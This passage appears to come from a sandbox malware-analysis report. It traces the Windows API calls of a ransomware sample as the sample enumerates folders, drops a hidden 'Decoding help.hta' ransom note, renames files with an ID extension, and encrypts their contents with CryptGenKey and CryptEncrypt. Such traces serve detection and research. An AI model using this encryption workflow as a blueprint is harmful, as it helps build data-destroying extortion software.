Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*") returned 126 [0058.729] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" [0058.729] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\decoding help.hta")) returned 0x1 [0058.730] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vc_runtimeAdditional_x64.msi") returned -1 [0058.730] lstrlenW (lpString="vc_runtimeAdditional_x64.msi") returned 28 [0058.730] lstrcmpiW (lpString1="[ID]", lpString2=".msi") returned 1 [0058.730] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*" [0058.730] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*") returned 126 [0058.730] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", lpString2="vc_runtimeAdditional_x64.msi" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" [0058.730] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" [0058.730] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0058.730] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi.[id]g9uzrlhjaygpwrm1[id]")) Thread: id = 828 os_tid = 0xb70 [0054.554] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\*.*", lpFindFileData=0x2659fd30 | out: lpFindFileData=0x2659fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d580500, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671b70 [0056.834] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.835] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0x2659fd30 | out: lpFindFileData=0x2659fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d580500, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.835] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.835] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.835] FindNextFileW (in: hFindFile=0x671b70, lpFindFileData=0x2659fd30 | out: lpFindFileData=0x2659fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.835] lstrcpyW (in: lpString1=0x9af9288, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\*.*" [0056.835] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\*.*") returned 63 [0056.835] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Decoding help.hta" [0056.835] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_tw\\decoding help.hta")) returned 0xffffffff [0056.835] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_tw\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa94 [0058.299] WriteFile (in: hFile=0xa94, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2659fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2659fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.300] CloseHandle (hObject=0xa94) returned 1 [0058.300] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.300] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.300] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.300] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\*.*" [0058.300] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\*.*") returned 63 [0058.300] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Reader_10.0.helpcfg" [0058.301] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Reader_10.0.helpcfg" [0058.301] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.301] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_tw\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_tw\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.301] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\zh_TW\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\zh_tw\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa94 [0058.301] CreateFileMappingA (hFile=0xa94, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xa98 [0058.301] CryptAcquireContextA (in: phProv=0x2659fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2659fcec*=0x2aac5010) returned 1 [0060.195] CryptGenKey (in: hProv=0x2aac5010, Algid=0x6610, dwFlags=0x1, phKey=0x2659fce8 | out: phKey=0x2659fce8*=0x42cf758) returned 1 [0060.195] CryptExportKey (in: hKey=0x42cf758, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2659fbe4, pdwDataLen=0x2659fce4 | out: pbData=0x2659fbe4*, pdwDataLen=0x2659fce4*=0x2c) returned 1 [0060.195] MapViewOfFile (hFileMappingObject=0xa98, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) Thread: id = 829 os_tid = 0xb80 [0054.555] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0x266dfd30 | out: lpFindFileData=0x266dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa938e870, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0x2a8588d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a53f0 [0056.133] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.134] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x266dfd30 | out: lpFindFileData=0x266dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa9368710, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0x2a8588d0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x2a8588d0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.474] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.474] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.475] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x266dfd30 | out: lpFindFileData=0x266dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdae7f300, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xdae7f300, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xdae7f300, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x59bde5, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0056.757] lstrcpyW (in: lpString1=0x110fba10, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*" [0056.757] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*") returned 122 [0056.757] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" [0056.757] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\decoding help.hta")) returned 0x20 [0058.724] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cab1.cab") returned 1 [0058.724] lstrlenW (lpString="cab1.cab") returned 8 [0058.724] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*" [0058.724] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\*.*") returned 122 [0058.724] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\", lpString2="cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" [0058.724] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" [0058.724] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0058.724] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.728] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{E512788E-C50B-3858-A4B9-73AD5F3F9E93}v14.10.25017\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{e512788e-c50b-3858-a4b9-73ad5f3f9e93}v14.10.25017\\packages\\vcruntimeadditional_amd64\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd50 [0058.728] CreateFileMappingA (hFile=0xd50, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xd54 [0058.728] CryptAcquireContextA (in: phProv=0x266dfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x266dfcec*=0x10e28240) returned 1 [0060.240] CryptGenKey (in: hProv=0x10e28240, Algid=0x6610, dwFlags=0x1, phKey=0x266dfce8 | out: phKey=0x266dfce8*=0x5da8f8) returned 1 [0060.240] CryptExportKey (in: hKey=0x5da8f8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x266dfbe4, pdwDataLen=0x266dfce4 | out: pbData=0x266dfbe4*, pdwDataLen=0x266dfce4*=0x2c) returned 1 [0060.240] MapViewOfFile (hFileMappingObject=0xd54, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0xc7d0000 [0063.350] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x266dfbe4*, pdwDataLen=0x266dfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x266dfbe4*, pdwDataLen=0x266dfcf8*=0x100) returned 1 [0063.353] CryptEncrypt (hKey=0x5da8f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xc7d0000, pdwDataLen=0x266dfce4*=0x100000, dwBufLen=0x100000) Thread: id = 830 os_tid = 0xb84 [0054.555] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*", lpFindFileData=0x2681fd30 | out: lpFindFileData=0x2681fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7690f9e4, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6716b0 [0054.555] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.555] FindNextFileW (in: hFindFile=0x6716b0, lpFindFileData=0x2681fd30 | out: lpFindFileData=0x2681fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7690f9e4, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.555] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.555] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.555] FindNextFileW (in: hFindFile=0x6716b0, lpFindFileData=0x2681fd30 | out: lpFindFileData=0x2681fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76b24d28, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0xcfc0a7e0, ftLastAccessTime.dwHighDateTime=0x1d2faf9, ftLastWriteTime.dwLowDateTime=0xcfc0a7e0, ftLastWriteTime.dwHighDateTime=0x1d2faf9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CacheManager", cAlternateFileName="CACHEM~1")) returned 1 [0054.555] lstrcmpW (lpString1=".", lpString2="CacheManager") returned -1 [0054.555] lstrcmpW (lpString1="..", lpString2="CacheManager") returned -1 [0054.555] lstrcmpiW (lpString1="windows", lpString2="CacheManager") returned 1 [0054.556] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*" [0054.556] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*") returned 67 [0054.556] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\", lpString2="CacheManager" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" [0054.556] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\*.*" [0054.556] GlobalMemoryStatus (in: lpBuffer=0x2681fd10 | out: lpBuffer=0x2681fd10) [0054.556] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11047730, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x808 [0054.558] CloseHandle (hObject=0x808) returned 1 [0054.558] FindNextFileW (in: hFindFile=0x6716b0, lpFindFileData=0x2681fd30 | out: lpFindFileData=0x2681fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x244fb42, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0xa13d69d0, ftLastAccessTime.dwHighDateTime=0x1d2dda3, ftLastWriteTime.dwLowDateTime=0xa13d69d0, ftLastWriteTime.dwHighDateTime=0x1d2dda3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Results", cAlternateFileName="")) returned 1 [0054.558] lstrcmpW (lpString1=".", lpString2="Results") returned -1 [0054.558] lstrcmpW (lpString1="..", lpString2="Results") returned -1 [0054.558] lstrcmpiW (lpString1="windows", lpString2="Results") returned 1 [0054.558] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*" [0054.558] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*") returned 67 [0054.558] 